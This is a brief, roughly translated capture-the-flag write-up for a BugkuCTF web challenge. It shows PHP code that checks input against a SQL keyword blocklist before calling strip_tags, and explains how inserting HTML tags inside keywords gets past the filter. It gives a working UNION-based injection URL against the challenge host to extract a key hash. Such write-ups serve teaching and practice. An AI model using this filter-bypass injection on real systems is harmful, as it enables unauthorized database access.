foreword
After writing the web questions for so long, it is considered to have finished all the basic parts of it. The next few days will continue to update the solutions of the BugkuCTF WEB part. In order not to affect the reading, the solutions of each question are in the form of a separate article. Published, thank you for your continued support and understanding, and encouragement~~~
We click on the link and there is a piece of code like this:
//过滤sql $array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit'); foreach ($array as $value) { if (substr_count($id, $value) > 0) { exit ('Contains sensitive keywords!'. $value ); } } // xss filter $id = strip_tags ( $id ); $query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";
Above // filter sql
The sql injection is strictly filtered, and it cannot be injected at all, but there must be a sparseness in every hundred secrets.
The following //xss filter
The strip_tags($id) function in , makes the injection have an idea.
First look at the strip_tags function:
The strip_tags() function strips HTML, XML and PHP tags from a string.
Then you can use this to add tags such as <a><br> in the middle of sensitive words such as union.
According to the title prompt, the parameters to be accessed are: ?id=x
The lookup table is the key data table, the id=1 value hash field value, we construct the following injection statement:
http://103.238.227.13:10087/?id=-1 u<a>nion selec<a>t 1,hash fro<a>m .key
The answer is directly revealed, this should be the flag we need
